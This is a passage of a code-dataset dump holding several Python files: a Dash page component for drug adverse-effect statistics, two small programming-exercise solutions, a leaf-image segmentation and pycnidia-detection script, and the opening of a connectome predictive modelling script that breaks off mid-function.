{\n \"id\": \"effets-indesirables\",\n \"label\": \"Effets indésirables\",\n },\n {\n \"id\": \"liste-specialites\",\n \"label\": \"Liste des spécialités\",\n },\n ],\n className=\"SideMenu\",\n ),\n html.Div(\n html.Div(\n [\n PatientsTraites(\n df_age=df_age,\n df_sexe=df_sexe,\n df_expo=df_expo,\n type=\"substance\",\n pie_colors=PIE_COLORS_SUBSTANCE,\n ),\n EffetsIndesirables(\n df_expo,\n df_notif,\n df_cas_age,\n df_cas_sexe,\n df_gravite,\n ),\n SystemesOrganes(df_expo, df_sub),\n ListeSpecialites(df_sub, df_sub_spe),\n ],\n className=\"ContentWrapper\",\n ),\n className=\"ContentLayoutWrapper\",\n ),\n ],\n ),\n footer_content()\n ], className=\"container-fluid stackableContainer\",\n ),\n )\n\n\ndef ListeSpecialites(df_sub: pd.DataFrame, df_sub_spe: pd.DataFrame) -> Component:\n series_sub = fetch_data.as_series(df_sub)\n if df_sub_spe is not None:\n df_sub_spe.nom = df_sub_spe.nom.str.capitalize()\n box_children = [\n html.Div(\n \"{} médicaments identifiés\".format(len(df_sub_spe)),\n className=\"normal-text mt-3\",\n style={\"color\": \"#33C2D6\"},\n ),\n dash_table.DataTable(\n id=\"substance-specialite-table\",\n columns=[{\"name\": \"nom\", \"id\": \"nom\"}],\n data=df_sub_spe.reset_index().to_dict(\"records\"),\n page_size=10,\n style_as_list_view=True,\n style_table={\"overflowX\": \"auto\"},\n style_cell={\n \"height\": \"50px\",\n \"backgroundColor\": \"#FFF\",\n },\n style_data={\n \"fontSize\": \"14px\",\n \"fontWeight\": \"400\",\n \"font-family\": \"Roboto\",\n \"lineHeight\": \"18px\",\n \"textAlign\": \"left\",\n },\n style_header={\"display\": \"none\"},\n ),\n ]\n else:\n box_children = [\n html.Div(\n \"Aucun médicament identifié\",\n className=\"normal-text mt-3\",\n style={\"color\": \"#33C2D6\"},\n )\n ]\n\n return TopicSection(\n [\n html.H2(\n \"Spécialités de médicaments contenant : {}\".format(\n series_sub.nom.capitalize()\n ),\n className=\"SectionTitle\",\n 
),\n Box(box_children),\n ],\n id=\"liste-specialites\",\n )\n\n\ndef EffetsIndesirables(\n df_expo: pd.DataFrame,\n df_notif: pd.DataFrame,\n df_cas_age: pd.DataFrame,\n df_cas_sexe: pd.DataFrame,\n df_gravite: pd.DataFrame,\n) -> Component:\n children = [\n html.H2(\n \"Cas déclarés d'effets indésirables de la substance active\",\n className=\"SectionTitle\",\n ),\n html.Span(\"mise à jour des données : {}\".format(last_update)),\n ]\n dataframes = [df_expo, df_notif, df_cas_age, df_cas_sexe, df_gravite]\n if all(df is None for df in dataframes):\n children.extend([EffetsIndesirablesTooltip(), NoData()])\n else:\n children.extend(\n [\n EffetsIndesirablesTooltip(),\n Box(\n [\n html.H4(\"Précision sur les déclarations d'effets indésirables\"),\n html.Div(\n [\n html.Img(\n src=app.get_asset_url(\"communique_120.svg\"),\n className=\"m-1 mr-4\",\n ),\n html.Div(\n [\n html.P(\n [\n html.B(\n \"Les données affichées sur les effets indésirables sont basées sur le déclaratif. \"\n ),\n \"Elles concernent les effets suspectés d’être liés à l’utilisation d’un ou plusieurs \"\n \"médicaments, ainsi que les mésusages, abus ou erreurs médicamenteuses. Il s’agit de cas évalués \"\n \"et validés par un comité d’experts.\",\n ],\n className=\"text-justify mt-4\",\n ),\n html.P(\n [\n \"L’ANSM se sert des déclarations spontanées que font les patients ou les professionnels de santé pour \",\n html.B(\n \"détecter des signaux en pharmacovigilance. \"\n ),\n \"Ce relevé des déclarations ne permet en aucun cas d'être \"\n \"exhaustif et de connaître la fréquence exacte de survenue des effets indésirables liés à l'exposition à un médicament.\",\n ],\n className=\"text-justify mt-4\",\n ),\n html.P(\n [\n html.Span(\n \"Pour plus d’informations, consultez : \",\n className=\"mt-4\",\n ),\n html.A(\n \"https://ansm.sante.fr/page/la-surveillance-renforcee-des-medicaments\",\n href=\"https://ansm.sante.fr/page/la-surveillance-renforcee-des-medicaments\",\n className=\"Link\",\n target=\"_blank\",\n ),\n ],\n className=\"text-justify\",\n ),\n ],\n ),\n ],\n className=\"d-flex flex-row flex-wrap\",\n ),\n ],\n ),\n EICasDeclareFigureBox(df_expo),\n Grid(\n [\n # EITauxDeclarationBox(df_expo),\n EIRepartitionSexeFigureBox(df_cas_sexe),\n EIRepartitionAgeGraphBox(df_cas_age, PIE_COLORS_SUBSTANCE),\n EIRepartitionGraviteGraphBox(df_gravite, PIE_COLORS_SUBSTANCE),\n # EITauxDeclarationSeveriteBox(df_expo, df_gravite),\n ],\n items_classname=\"col-12 col-sm-6 col-md-6\",\n ),\n RepartitionNotificateursFigureBox(df_notif),\n ]\n )\n return TopicSection(\n children,\n id=\"effets-indesirables\",\n )\n\n\n@app.callback(\n dd.Output(\"url\", \"href\"),\n dd.Input(\"substance-specialite-table\", \"active_cell\"),\n dd.State(\"substance-specialite-table\", \"page_current\"),\n dd.State(\"substance-specialite-table\", \"page_size\"),\n dd.State(\"substance-specialite-table\", \"data\"),\n)\ndef getActiveCell(active_cell, page_current, page_size, data):\n if active_cell:\n row = active_cell[\"row\"]\n cellData = data[(page_current or 0) * page_size + row][\"cis\"]\n return \"/specialite?\" + urlencode({\"search\": quote_plus(cellData)})\n else:\n raise PreventUpdate\n\n\n@app.callback(\n [\n dd.Output(\"update-on-click-data\", \"is_open\"),\n dd.Output(\"body-modal\", \"children\"),\n dd.Output(\"header-modal\", \"children\"),\n ],\n [\n dd.Input({\"type\": \"close-backdrop-substance\", \"index\": dd.ALL}, \"n_clicks\"),\n dd.Input(\"url\", \"href\"),\n dd.Input({\"type\": \"soc-treemap-substance\", \"index\": dd.ALL}, 
\"clickData\"),\n ],\n)\ndef open_ei_modal_on_substance_page(clicks_close, href, click_data):\n # beware! with Input id as object click_data is a list !!\n changed_id = [p[\"prop_id\"] for p in dash.callback_context.triggered][0]\n\n # User has not clicked on modal yet\n if not click_data or not trim_list(click_data):\n raise PreventUpdate()\n # Modal has been closed by user\n if \"close-backdrop\" in changed_id:\n return False, \"\", \"\"\n current_entry = click_data[0][\"points\"][0][\"entry\"]\n # User is going up in treemap\n if current_entry != \"\":\n return False, \"\", \"\"\n\n selected_soc = click_data[0][\"points\"][0][\"label\"]\n\n parsed_url = urlparse(unquote_plus(href))\n query = parse_qs(parsed_url.query)\n sub_code = query[\"search\"][0]\n df_hlt = substance.get_hlt_df(sub_code)\n df_hlt = df_hlt[df_hlt.soc_long == selected_soc].sort_values(\n by=\"pourcentage_cas\", ascending=False\n )\n\n return (\n True,\n EIRepartitionHLTBox(df_hlt),\n selected_soc,\n )\n","sub_path":"datamed/web/apps/components/substance.py","file_name":"substance.py","file_ext":"py","file_size_in_byte":14751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"640690850","text":"def caculate_2(temps):\n# print(temps,end=' ')\n y = temps.copy()\n y.reverse()\n index=0\n for x in range(len(y)):\n index = index + y[x]*(2**x)\n# print(index)\n answera.append(index)\n\ndef caculate_3(temps):\n# print(temps,end=' ')\n y = temps.copy()\n y.reverse()\n index=0\n for x in range(len(y)):\n index = index + y[x]*(3**x)\n# print(index)\n answerb.append(index)\n\nsec = input()\nthird = input()\na1 = list(sec)\nb1 = list(third)\na = [int(i) for i in a1]\nb = [int(i) for i in b1]\nk = [0,1,2]\nanswera = list()\nanswerb = list()\nanswer = list()\nfor i in range(len(a)):\n# print(\"2进制-{}change:\".format(i))\n temp = a.copy()\n temp[i] = 1-temp[i]\n caculate_2(temp)\nfor i in range(len(b)):\n# print(\"3进制-{}change:\".format(i))\n temp = b.copy()\n k1 = k.copy()\n k1.pop(temp[i])\n# print(k1)\n for j in range(2):\n temp[i] = k1[j]\n# print(temp)\n caculate_3(temp)\nfor i in range(len(answera)):\n temp0 = answera[i]\n for j in range(len(answerb)):\n if temp0==answerb[j]:\n answer.append(temp0)\nprint(answer[0],end='')\n\n","sub_path":"Code/CodeRecords/2951/60716/256083.py","file_name":"256083.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"536340392","text":"def solution(bridge_length, weight, truck_weights):\n answer = 0\n # bridge의 길이만큼 on_bridge에 o을 넣어 가상의 bridge 생성\n on_bridge = [0] * bridge_length\n \n # on_bridge에 요소가 존재할 동안\n while on_bridge:\n # 시간(answer)에 += 1을 해준 뒤 아래 작업 수행\n answer += 1\n # 시간 += 1이 되었기 때문에 한 단계 앞으로 나아감을 나타내기 위해\n # on_bridge에서 dequeue\n on_bridge.pop(0)\n\n # truck_weights에 요소가 남아 있는 동안\n if truck_weights:\n # 현재 on_bridge에 있는 트럭의 모든 무계의 합 + truck_weights[0]의 합이\n # 다리가 견딜 수 있는 무게(weight) 이하일 경우\n if sum(on_bridge) + truck_weights[0] <= weight:\n # on_bridge에 truck_weights[0]을 enqueue\n on_bridge.append(truck_weights[0])\n # on_bridge에 추가한 트럭을 dequeue\n truck_weights.pop(0)\n else:\n # 다리의 길이를 유지하기 위해 on_dridge에 0을 enqueue\n on_bridge.append(0)\n return answer\n","sub_path":"code/shinn92kr/stack&queue/프로그래머스_다리를지나는트럭.py","file_name":"프로그래머스_다리를지나는트럭.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"62823757","text":"#import required packages 
and functions\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport imageio\nfrom skimage import util\nfrom skimage.data import astronaut\nfrom skimage.color import rgb2gray\nfrom skimage.filters import sobel\nfrom skimage.segmentation import felzenszwalb, slic, quickshift, watershed\nfrom skimage.segmentation import mark_boundaries\nfrom skimage.util import img_as_float\nfrom skimage import io, color\nfrom skimage import morphology\nimport cv2\nfrom functools import reduce\nfrom skimage.feature import peak_local_max\nfrom skimage import data, img_as_float\nfrom PIL import Image\nimport PIL.ImageOps\nfrom scipy import ndimage as ndi\nfrom skimage.morphology import extrema\nfrom skimage.measure import label\nfrom skimage import exposure\nimport os\n\npath_folder_raw = \"O:/FIP/2018/WW023/RefTraits/Macro/stb_senescence2018_fpww023/macro_outcomes\"\n\n#function to list all images to analyze\ndef list_files(dir):\n file_list = []\n for (dirpath, dirnames, filenames) in os.walk(dir):\n for f in filenames:\n if f.endswith(\"leafOriginal.png\"):\n if \"_t3_\" in f:\n file_list.append(os.path.join(dirpath, f))\n return file_list\n\n#list all images to analyze\nfiles = list_files(path_folder_raw)\n\nsave_path = \"O:/FIP/2018/WW023/RefTraits/Preprocessed/t3/\"\n\n#iterate over images\nfor k in files:\n\n try:\n\n # Load image, convert from BGR to RGB\n img = cv2.cvtColor(cv2.imread(k),\n cv2.COLOR_BGR2RGB)\n img.shape # a three dimensional array\n\n # crop to area of interest, removing black lines\n img = img[350:1900, 275:8200]\n\n # remove white background\n # blur image a bit\n blur = cv2.GaussianBlur(img, (15, 15), 2)\n\n # mask for paper background\n lower_white = np.array([200, 200, 200], dtype=np.uint8) # threshold for white pixels\n upper_white = np.array([255, 255, 255], dtype=np.uint8)\n mask1 = cv2.inRange(blur, lower_white, upper_white) # could also use threshold\n # mask needs to be inverted,\n # since we want to set the BACKGROUND to white\n mask1 = cv2.bitwise_not(mask1)\n\n # There are still spots not belonging to the leaf\n # remove small objects to get rid of them\n\n # find all connected components\n nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(mask1, connectivity=8)\n # connectedComponentswithStats yields every seperated component with information on each of them, such as size\n # take out the background which is also considered a component\n sizes = stats[1:, -1];\n nb_components = nb_components - 1\n\n # minimal size of particle\n # somwhere between largest unreal feature and leaf size\n min_size = 500000\n\n # cleaned mask\n mask_cleaned = np.zeros((output.shape))\n # for every component in the image,\n # keep only those above min_size\n for i in range(0, nb_components):\n if sizes[i] >= min_size:\n mask_cleaned[output == i + 1] = 255\n\n # apply cleaned mask to the image\n [indx, indy] = np.where(mask_cleaned == 0)\n Color_Masked = img.copy()\n Color_Masked[indx, indy] = 255\n\n # Transform to HSV\n img = cv2.cvtColor(Color_Masked, cv2.COLOR_RGB2HSV)\n\n # Create a mask for brown pixels\n mask = cv2.inRange(img, np.array([0, 95, 95]),np.array([30, 255, 255]))\n\n\n ####\n\n img_fill_holes = ndi.binary_fill_holes(cv2.bitwise_not(mask), structure=np.ones((4,4))).astype(np.uint8)\n img_fill_holes = cv2.floodFill(img_fill_holes, mask, (0, 0), 255);\n\n ####\n\n\n # Fill holes in the mask\n\n img_fill_holes = ndi.binary_fill_holes(mask, structure=np.ones((20,20))).astype(np.uint8)\n\n # Remove Noise\n ## Rectangular Kernel\n kernel = 
cv2.getStructuringElement(cv2.MORPH_RECT,(6,6))\n ## Remove noise by morphological opening\n opening = cv2.morphologyEx(img_fill_holes, cv2.MORPH_OPEN, kernel)\n\n # Remove small areas\n ## Find all connected components\n nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(opening, connectivity=8)\n ## ConnectedComponentswithStats yields every seperated component with information on each of them, such as size\n ## Take out the background which is also considered a component\n sizes = stats[1:, -1]; nb_components = nb_components - 1\n ## Define minimal size of particle\n min_size = 10001\n ## Create cleaned mask\n mask_cleaned = np.zeros((output.shape))\n ## for every component in the image,\n ## keep only those above min_size\n for i in range(0, nb_components):\n if sizes[i] >= min_size:\n mask_cleaned[output == i + 1] = 255\n mask_cleaned = np.uint8(mask_cleaned)\n\n # Find contours\n _, contours, _ = cv2.findContours(mask_cleaned, mode=cv2.RETR_TREE, method=cv2.CHAIN_APPROX_SIMPLE)\n\n # Draw contours onto original image\n cnt = cv2.drawContours(Color_Masked, contours, -1, (128,255,0), 2)\n\n # plot\n fig, ax = plt.subplots(1, 2, figsize=(10, 10), sharex=True, sharey=True)\n ax[0].imshow(mask)\n ax[0].set_title(\"dcs\")\n ax[1].imshow(img_fill_holes)\n ax[1].set_title(\"original\")\n plt.tight_layout()\n plt.show()\n\n cnt = cv2.resize(cnt, (0, 0), fx=0.5, fy=0.5)\n\n\n # Save overlay\n filename = os.path.basename(k)\n cv2.imwrite(save_path + filename, cv2.cvtColor(cnt, cv2.COLOR_RGB2BGR))\n\n except:\n\n print(\"Error in: \" + k)\n\n########################################################################################################################\n# Segment leaf from background\n########################################################################################################################\n\n# Load image, convert from BGR to RGB\nimg = cv2.cvtColor(cv2.imread(r\"O:\\Projects\\KP0011\\3\\RefData\\Test_py\\fpww023_t5_fungic_sn127_5_leafOriginal.png\"),\n cv2.COLOR_BGR2RGB)\nimg.shape #a three dimensional array\n\n#crop to area of interest, removing black lines\nimg = img[350:1900, 270:8200]\n\n#remove white background\n#blur image a bit\nblur = cv2.GaussianBlur(img, (15, 15), 2)\n\n#mask for paper background\nlower_white = np.array([200, 200, 200], dtype=np.uint8) #threshold for white pixels\nupper_white = np.array([255, 255, 255], dtype=np.uint8)\nmask1 = cv2.inRange(blur, lower_white, upper_white) # could also use threshold\n#mask needs to be inverted,\n#since we want to set the BACKGROUND to white\nmask1 = cv2.bitwise_not(mask1)\n\n#There are still spots not belonging to the leaf\n#remove small objects to get rid of them\n\n#find all connected components\nnb_components, output, stats, centroids = cv2.connectedComponentsWithStats(mask1, connectivity=8)\n#connectedComponentswithStats yields every seperated component with information on each of them, such as size\n#take out the background which is also considered a component\nsizes = stats[1:, -1]; nb_components = nb_components - 1\n\n#minimal size of particle\n#somwhere between largest unreal feature and leaf size\nmin_size = 500000\n\n#cleaned mask\nmask_cleaned = np.zeros((output.shape))\n#for every component in the image,\n#keep only those above min_size\nfor i in range(0, nb_components):\n if sizes[i] >= min_size:\n mask_cleaned[output == i + 1] = 255\n\n#apply cleaned mask to the image\n[indx, indy] = np.where(mask_cleaned == 0)\nColor_Masked = img.copy()\nColor_Masked[indx, indy] = 
255\n\n#plot\nfig, ax = plt.subplots(1,1, figsize=(10, 10))\nax.imshow(Color_Masked)\nax.set_title(\"MASKED\")\nplt.tight_layout()\nplt.show()\n\n########################################################################################################################\n# De-correlation stretching\n########################################################################################################################\n\n#code source: https://github.com/lbrabec/decorrstretch\ndef decorrstretch(A, tol=None):\n    \"\"\"\n    Apply decorrelation stretch to image\n    Arguments:\n    A   -- image in cv2/numpy.array format\n    tol -- upper and lower limit of contrast stretching\n    \"\"\"\n\n    # save the original shape\n    orig_shape = A.shape\n    # reshape the image\n    #         B G R\n    # pixel 1 .\n    # pixel 2 .\n    #  . . .  .\n    A = A.reshape((-1,3)).astype(np.float)\n    # covariance matrix of A\n    cov = np.cov(A.T)\n    # source and target sigma\n    sigma = np.diag(np.sqrt(cov.diagonal()))\n    # eigen decomposition of covariance matrix\n    eigval, V = np.linalg.eig(cov)\n    # stretch matrix\n    S = np.diag(1/np.sqrt(eigval))\n    # compute mean of each color\n    mean = np.mean(A, axis=0)\n    # substract the mean from image\n    A -= mean\n    # compute the transformation matrix\n    T = reduce(np.dot, [sigma, V, S, V.T])\n    # compute offset\n    offset = mean - np.dot(mean, T)\n    # transform the image\n    A = np.dot(A, T)\n    # add the mean and offset\n    A += mean + offset\n    # restore original shape\n    B = A.reshape(orig_shape)\n    # for each color...\n    for b in range(3):\n        # apply contrast stretching if requested\n        if tol:\n            # find lower and upper limit for contrast stretching\n            low, high = np.percentile(B[:,:,b], 100*tol), np.percentile(B[:,:,b], 100-100*tol)\n            B[B<low] = low\n            B[B>high] = high\n        # ...rescale the color values to 0..255\n        B[:,:,b] = 255 * (B[:,:,b] - B[:,:,b].min())/(B[:,:,b].max() - B[:,:,b].min())\n    # return it as uint8 (byte) image\n    return B.astype(np.uint8)\n\nmask_ds = decorrstretch(Color_Masked)\n\n#plot\nfig, ax = plt.subplots(1,2, figsize=(10, 10), sharex=True, sharey=True)\nax[0].imshow(mask_ds)\nax[0].set_title(\"dcs\")\nax[1].imshow(Color_Masked)\nax[1].set_title(\"original\")\nplt.tight_layout()\nplt.show()\n\n########################################################################################################################\n# Transform to grayscale image\n########################################################################################################################\n\ndef rgb2gray(rgb):\n    return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\n\nimg_gs = rgb2gray(Color_Masked)\n\nfig, ax = plt.subplots(1,1, figsize=(10, 10))\nax.imshow(img_gs, cmap = \"gray\")\nax.set_title(\"gray\")\nplt.tight_layout()\nplt.show()\n\n#invert grayscale image\nimg_gs_inv = util.invert(img_gs)\nimg_gs_inv = np.around(img_gs_inv, decimals=0)\n\nfig, ax = plt.subplots()\nax.plot()\nax.imshow(img_gs_inv, cmap = \"gray\")\nax.set_title('mask')\nplt.tight_layout()\nplt.show()\n\n########################################################################################################################\n# Detect Pycnidia\n########################################################################################################################\n\n# image_max is the dilation of im with a 20*20 structuring element\n# It is used within peak_local_max function\nimage_max = ndi.maximum_filter(img_gs_inv, size=3, mode='constant')\n\n# Comparison between image_max and im to find the coordinates of local maxima\ncoordinates = peak_local_max(img_gs_inv, min_distance=3, threshold_abs=-250)\n# 
display result\nfig, axes = plt.subplots(1, 2, figsize=(8, 3), sharex=True, sharey=True)\nax = axes.ravel()\nax[0].imshow(Color_Masked, cmap=\"gray\")\nax[0].axis('off')\nax[0].set_title('Original')\n\nax[1].imshow(img_gs_inv, cmap=\"gray\")\nax[1].autoscale(False)\nax[1].plot(coordinates[:, 1], coordinates[:, 0], 'r.')\nax[1].axis('off')\nax[1].set_title('Peak local max')\n\nfig.tight_layout()\n\nplt.show()\n\n###########################################\n\n#prepare image for h_maxima and local_maxima functions\nimg = color.rgb2gray(Color_Masked)\nimg = 255-img\nimg = exposure.rescale_intensity(img)\n\n#extract local maxima\nlocal_maxima = extrema.local_maxima(img_gs_inv)\nlabel_maxima = label(local_maxima)\noverlay = color.label2rgb(label_maxima, img_gs_inv, alpha=0.7, bg_label=0,\n bg_color=None, colors=[(1, 0, 0)])\n\n#local maxima with certrain contrast\nh = 0.05\nding = morphology.selem.disk(radius=3)\nh_maxima = extrema.h_maxima(img, h, selem=ding)\nlabel_h_maxima = label(h_maxima)\noverlay_h = color.label2rgb(label_h_maxima, img, alpha=0.7, bg_label=0,\n bg_color=None, colors=[(1, 0, 0)])\n\n# a new figure with 3 subplots\nfig, ax = plt.subplots(1, 3, figsize=(15, 5), sharex=True, sharey=True)\n\nax[0].imshow(Color_Masked, cmap='gray', interpolation='none')\nax[0].set_title('Original image')\nax[0].axis('off')\n\nax[1].imshow(overlay, interpolation='none')\nax[1].set_title('Local Maxima')\nax[1].axis('off')\n\nax[2].imshow(overlay_h, interpolation='none')\nax[2].set_title('h maxima for h = %.2f' % h)\nax[2].axis('off')\nplt.show()\n\n########################################################################################################################\n# Segmentation into Super-Pixels\n########################################################################################################################\n\n#get leaf size in pixels\nleaf_size = np.sum(img_gs != 255)\n\n#adjust segments to leaf size\nnsegs = leaf_size/150\n\nsegments_slic_ok = slic(Color_Masked, n_segments=nsegs, compactness=10, sigma=1, max_size_factor=3)\nfig, ax = plt.subplots()\nax.plot()\nax.imshow(mark_boundaries(Color_Masked, segments_slic_ok))\nax.set_title('qs')\nfor a in ax.ravel():\n a.set_axis_off()\nplt.tight_layout()\nplt.show()\n\n\n\n\n###########################################\n\n\ncrop_img = Color_Masked[1250:1600, 200:3000]\n\nfig, ax = plt.subplots()\nax.plot()\nax.imshow(img)\nax.set_title('mask')\nplt.tight_layout()\nplt.show()\n\n\nsegments_slic_ok = slic(crop_img, n_segments=1000, compactness=10, sigma=1, max_size_factor=3)\nsegments_slic = slic(crop_img, n_segments=1000, compactness=10, sigma=0.75, max_size_factor=3)\n\n\nsegments_quick100 = quickshift(crop_img, kernel_size=5, max_dist=100, ratio=1)\nsegments_quick200 = quickshift(crop_img, kernel_size=5, max_dist=200, ratio=1)\nsegments_quick400 = quickshift(crop_img, kernel_size=5, max_dist=400, ratio=1)\nsegments_quick800 = quickshift(crop_img, kernel_size=5, max_dist=800, ratio=1)\nsegments_quick2 = quickshift(crop_img, kernel_size=8, max_dist=800, ratio=1)\n\ngradient = sobel(rgb2gray(crop_img))\nsegments_watershed = watershed(gradient, markers=250, compactness=0.001)\n\nsegments_fz = felzenszwalb(crop_img, scale=50, sigma=1, min_size=50)\n\nfig, ax = plt.subplots()\nax.plot()\nax.imshow(mark_boundaries(crop_img, segments_fz))\nax.set_title('qs')\nfor a in ax.ravel():\n 
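# hide frames and ticks on each panel; note that bare plt.subplots() returns a\n    # single Axes (not an array), so ravel() here assumes an array of Axes --\n    # wrapping with np.atleast_1d(ax) would make this loop safe either way\n    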
a.set_axis_off()\nplt.tight_layout()\nplt.show()\n\n###########################################\n\n\n\n\n\n\n\n\n","sub_path":"seg.py","file_name":"seg.py","file_ext":"py","file_size_in_byte":14710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"492049213","text":"\"\"\"\n# Connectome Predictive Modelling - Python adaptation - V2.0\n\nScript - CPM (LOOCV)\nAuthor: Frederic St-Onge (adapted from Shen et al. 2017)\n\nDate created: 2022-02-21\nDate modified: 2022-11-03\n\nVersion 2.0\n\nFuture versions:\n- Correlations in Matlab go much faster. We did some testing where we imported the original matlab function in Python. It works, but I am not sure if the gain in complexity is warranted for a little bit of time (really not that much time) gained.\n- Parallelization with numba?\n- Need to restore the other options from the original CPM (other types of feature selections, etc.)\n\n\"\"\"\n\n#CPM - Python translation\nimport os\nimport re\nfrom argparse import ArgumentParser\nimport warnings\n\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LinearRegression as lm\nfrom sklearn.svm import SVR\nfrom sklearn import metrics\nfrom sklearn import preprocessing\n\n\ndef main():\n \"\"\" Main function launching the CPM.\n \"\"\"\n print('---------------------------------------------')\n print('--Connectome Predictive Modelling in Python--')\n args = parsing()\n print('Parameters:')\n print(f' Path to connectivity matrices (modality 1): {args.path_arrays_mod1}')\n if args.path_arrays_mod2:\n print(f' Path to connectivity matrices (modality 2): {args.path_arrays_mod2}')\n print(f' File to use for behavior predictions: {args.data_to_pred_path}')\n print(' ')\n print(f' Type of model to train: {args.model}')\n print(f' Threshold level for feature selection: {args.thresh_corr}')\n print(f' Threshold level for shared edges in final mask: {args.thresh_retain}')\n print(f' Path to output: {args.output}')\n print(f' Name of the run: {args.name}')\n print(f' ')\n print('---------------------------------------------')\n print(' ')\n\n print('Importing the arrays for modality 1...')\n behav_data, dict_id_arrays1 = dictionary_importer(args.path_arrays_mod1, args.data_to_pred_path)\n if args.path_arrays_mod2:\n print('Importing the arrays for modality 2...')\n dict_id_arrays2 = dictionary_importer(args.path_arrays_mod2)\n else:\n dict_id_arrays2 = None\n\n print('Merging the connectivity matrices together...')\n matrix_3d = matrix_progenitor(dict_id_arrays_mod1=dict_id_arrays1,\n dict_id_arrays_mod2=dict_id_arrays2, behav_data=behav_data)\n\n print('Launching CPMPY...')\n behav_train, behav_pred_train, behav_test, dict_rmse, dict_behav_pred = cpmpy(\n behav_data=behav_data, matrix_3d=matrix_3d, args=args)\n\n print('Computing CPM performance...')\n predict_meas_valid = cpm_prediction_measures(behav_train=behav_train,\n behav_pred_train=behav_pred_train, behav_test=behav_test, \n dict_behav_pred=dict_behav_pred, args=args)\n\n print('Exporting CPM performance to file...')\n cpm_export(predict_meas_valid=predict_meas_valid, args=args)\n\ndef parsing():\n \"\"\" Take user arguments and return them.\n \"\"\"\n\n parser = ArgumentParser(description=\"\")\n\n parser.add_argument(\"-p1\", \"--path_arrays_mod1\", help=\"Path to the connectivity matrices to use.\")\n parser.add_argument(\"-p2\", \"--path_arrays_mod2\", default=None, help=\"Path to connectivity matrices to the second modality 
to use.\")\n parser.add_argument(\"-d\", \"--data_to_pred_path\", help=\"Behavior data to predict with the connectivity.\")\n parser.add_argument(\"-t\", \"--thresh_corr\", default=0.01, type=float, help='In the CPM, threshold at which a p-value is considered as positive (at the edge-level).')\n parser.add_argument(\"-r\", '--thresh_retain', default=0.95, type=float, help='Percentage of edges that should be retained in the final set.')\n parser.add_argument(\"-o\", \"--output\", help=\"Path where the output should be stored once run.\")\n parser.add_argument(\"-m\", \"--model\", choices=['LM', 'SVR'], help='Which prediction model to use? If SVR, a grid search is performed.')\n parser.add_argument(\"-n\", \"--name\", help=\"Suffix to add to the files to save.\")\n\n args = parser.parse_args()\n\n return args\n\ndef dictionary_importer(path_arrays, data_to_pred_path=None):\n \"\"\" Imports the arrays and the IDs to analyse using a dictionary.\n\n Needs to run as many times as I have modalities.\n \"\"\"\n\n #Import array names and ID data.\n folder_ls = os.listdir(path_arrays)\n behav_data = pd.read_csv(data_to_pred_path, index_col=0)\n\n #Empty dictionary to store the connectivity arrays\n dict_id_arrays = {}\n\n for file in folder_ls:\n #Extract ID from the files in the folder\n #TODO: Change below to an argument given by user for subject ID\n ids = re.search(r'[0-9]{6}', file).group()[0:6]\n\n #If the ID is in the target behavioral data, we import the corresponding array and store it\n if ids in behav_data.index.astype(str):\n array = np.loadtxt(f\"{path_arrays}/{file}\")\n\n dict_id_arrays[ids] = array\n\n if data_to_pred_path:\n return behav_data, dict_id_arrays\n else:\n return dict_id_arrays\n\ndef _3d_mat_baker(dicto):\n \"\"\" Hidden function. 
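Stacks the dict values depth-wise with\n    numpy.dstack, so e.g. two (3, 3) arrays become one (3, 3, 2) cube\n    (toy shapes for illustration):\n\n        >>> import numpy as np\n        >>> np.dstack([np.zeros((3, 3)), np.ones((3, 3))]).shape\n        (3, 3, 2)\n\n    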
Takes a dictionary and turn the values in a 3d matrix.\n \"\"\"\n list_arrays = []\n for arrays in dicto.values():\n list_arrays.append(arrays)\n\n matrix_3d = np.dstack(list_arrays)\n\n return matrix_3d\n\ndef matrix_progenitor(dict_id_arrays_mod1, dict_id_arrays_mod2, behav_data):\n \"\"\" Function taking a dictionary of ids and arrays and returning a 3D array instead.\n\n When we have 2 modalities, we concatenate them on the first axis (stick the cubes side-by-side)\n \"\"\"\n\n matrix_3d_mod1 = _3d_mat_baker(dict_id_arrays_mod1)\n\n if dict_id_arrays_mod2:\n matrix_3d_mod2 = _3d_mat_baker(dict_id_arrays_mod2)\n matrix_3d = np.concatenate((matrix_3d_mod1, matrix_3d_mod2), axis=1)\n else:\n matrix_3d = matrix_3d_mod1.copy()\n\n #Run a couple user checks\n ### Check the number of matrices match the file inputed\n if matrix_3d.shape[2] == len(behav_data.index.values):\n print(f' Total of {matrix_3d.shape[2]} participants')\n else:\n raise RuntimeError(\" ERROR: The number of arrays doesn't match the desired\"\n \" number of participants\")\n\n ### If second modality given, then should be same size as first\n if dict_id_arrays_mod2:\n if matrix_3d.shape[1] != (2 * matrix_3d.shape[0]):\n raise RuntimeError(\" ERROR: The second modality\"\n \" should have the same number of nodes/columns as the first.\")\n ### If only one modality, then should be symmetrical\n else:\n if matrix_3d.shape[0] != matrix_3d.shape[1]:\n raise RuntimeError(\" ERROR: Currently, only \"\n \"symetric matrices are supported by cpmpy\")\n\n return matrix_3d\n\ndef _cpm_prep_sizes(matrix_3d):\n \"\"\" Simple function computing size of arrays for the CPM.\n \"\"\"\n\n nb_nodes_rows = matrix_3d.shape[0]\n nb_nodes_cols = matrix_3d.shape[1]\n\n return nb_nodes_rows, nb_nodes_cols\n\ndef _cpm_train_test_split(behav_data, matrix_3d):\n \"\"\" Wrapper function on top of sklearn's model selection.\n It just adds some data manipulation before and after to play\n around the 3d matrix.\n\n Returns the 2D split data\n \"\"\"\n\n #Turn the FP values to a single flat numpy array\n behav_array = np.squeeze(behav_data.to_numpy())\n\n #Turn the 3D matrix to a 2D array where rows are edges and columns are IDs.\n flat_fc_array = matrix_3d\\\n .reshape((matrix_3d.shape[0] * matrix_3d.shape[1]), matrix_3d.shape[2])\\\n .T #Flip so the IDs are rows (samples)\n\n #Train test split\n mat_train, mat_test, behav_train, behav_test = model_selection\\\n 